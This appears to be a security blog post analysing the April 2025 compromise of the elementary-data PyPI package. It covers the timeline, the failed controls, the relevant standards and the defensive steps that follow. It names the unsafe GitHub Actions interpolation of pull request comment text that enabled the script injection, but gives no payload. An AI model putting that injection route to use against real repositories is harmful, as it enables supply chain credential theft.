What Happened
On April 24, 2025, attackers published version 0.23.3 of the Python package elementary-data to PyPI. This malicious release contained code designed to exfiltrate cloud credentials from any environment where it was installed. The package was available for about 8-10 hours—from 22:20 UTC on April 24 until removal between 8:51 and 11:51 UTC on April 25.
The attack exploited a script injection flaw in the package maintainer's GitHub Actions workflow. An attacker crafted a pull request comment that exploited unsafe handling of user input in the CI/CD pipeline, allowing them to inject malicious code into the package build process. Any data engineer who ran pip install elementary-data==0.23.3 during that window potentially exposed AWS credentials, GCP service account keys, Azure tokens, and database connection strings to the attacker.
Timeline
April 24, 22:20 UTC: Malicious version 0.23.3 published to PyPI
April 24-25 (8-10 hour window): Package available for installation; credential theft active
April 25, 8:51-11:51 UTC: Package removed from PyPI
The narrow detection window is significant. Organizations with automated dependency updates or developers installing packages during off-hours may not have noticed the compromise until credentials were already exfiltrated.
Which Controls Failed or Were Missing
Unsafe GitHub Actions Workflow Configuration
The root cause was a workflow that processed untrusted input—specifically, pull request comments—without proper sanitization. GitHub Actions workflows can execute arbitrary code when expressions like ${{ github.event.comment.body }} are used in run: steps. This is a well-documented anti-pattern, yet it remains common in open-source repositories.
No Package Signing or Verification
The compromised package was published without cryptographic signatures that would allow consumers to verify authenticity. While PyPI supports package signing, it's not enforced, and most Python toolchains don't validate signatures by default.
Missing Dependency Pinning and Lock Files
Organizations that installed the package likely did so with unpinned version specifications (elementary-data>=0.23.0 rather than elementary-data==0.23.2). This meant automated systems pulled the malicious version immediately upon publication.
Inadequate Secret Rotation Procedures
The 8-10 hour exposure window was sufficient for credential theft, but the real damage depends on how long those credentials remained valid. Organizations without automated secret rotation or anomalous access detection faced extended risk.
Lack of Runtime Integrity Monitoring
The malicious code executed during package installation. Organizations without file integrity monitoring or runtime application self-protection (RASP) had no visibility into the exfiltration activity until after the fact.
What the Relevant Standards Require
PCI DSS v4.0.1 Requirement 6.3.2
"Security of bespoke and custom software and software components is managed throughout the software development lifecycle." This includes supply chain security. Organizations processing payment data must validate that third-party code components don't introduce vulnerabilities—including malicious packages in their dependency chains.
Gap: Most organizations don't treat open-source dependencies as "third-party code" requiring security validation, despite the identical risk profile.
NIST 800-53 Rev 5: SA-12 (Supply Chain Protection)
"The organization protects against supply chain threats by employing security safeguards as part of a comprehensive, defense-in-depth information security strategy." Specific controls include:
- SA-12(5): Limitation of harm from malicious code
- SA-12(9): Operations security for supply chain elements
- SA-12(11): Penetration testing and analysis of supply chain elements
Gap: Few organizations perform ongoing security analysis of their transitive dependencies, especially for data engineering tools that may not be considered "critical" infrastructure.
ISO 27001:2022 Control 8.30 (Outsourced Development)
"Information security requirements for outsourced development shall be defined and agreed with the supplier." While this control typically applies to contracted development, the principle extends to open-source dependencies—they're code you're running but didn't write.
Gap: Dependency installation is rarely governed by the same security requirements as custom code or contracted development.
Lessons and Action Items for Your Team
Immediate: Audit for Exposure
If you use elementary-data or any package in the Python data engineering ecosystem, check your installation logs for April 24-25. Look for version 0.23.3 specifically:
grep "elementary-data==0.23.3" /var/log/pip.log
If you find it, assume credential compromise. Rotate all cloud credentials accessible from affected environments immediately—not just the credentials you think were exposed, but everything in that scope.
Short-term: Harden GitHub Actions Workflows
If you maintain packages or use GitHub Actions for CI/CD:
Never use expressions in run commands with untrusted input. Replace
${{ github.event.comment.body }}with environment variables that GitHub sanitizes automatically.Enable workflow approval requirements for first-time contributors. GitHub's settings allow you to require manual approval before workflows run on pull requests from new users.
Use OpenID Connect (OIDC) tokens instead of long-lived credentials in workflows. GitHub's OIDC integration with AWS, GCP, and Azure provides short-lived tokens scoped to specific workflows.
Medium-term: Implement Dependency Integrity Controls
- Pin all dependencies with hash verification. Use lock files (
requirements.txtwith hashes,poetry.lock,Pipfile.lock) and verify them in CI:
pip install --require-hashes -r requirements.txt
Deploy a private package mirror or proxy (Artifactory, Nexus, or AWS CodeArtifact). Configure it to:
- Cache packages after manual security review
- Block new versions until approved
- Log all package installations for forensic capability
Run dependency scanning in CI with tools that check for known malicious packages (not just CVEs). Socket Security, Phylum, and Checkmarx Supply Chain Security specifically detect malicious behavior patterns.
Long-term: Build Defense in Depth
Implement least-privilege credential scoping. The credentials stolen in this attack were likely over-provisioned. Use IAM role boundaries and resource tags to limit blast radius.
Deploy runtime monitoring that detects unexpected network connections during package installation. Tools like Falco or osquery can alert on outbound connections from pip or Python setup scripts.
Establish automated credential rotation with maximum lifetimes of 24-48 hours for programmatic access. AWS Secrets Manager, Azure Key Vault, and GCP Secret Manager all support this.
Create an incident response playbook specifically for supply chain compromises. Your existing breach procedures likely assume direct intrusion, not malicious code in trusted packages. The response timeline and evidence preservation steps are different.
The elementary-data attack succeeded because it exploited the trust relationship between developers and their tools. You can't eliminate that trust, but you can verify it continuously. Treat every package installation as a potential security event, and build controls that assume compromise rather than hoping for package maintainer vigilance.



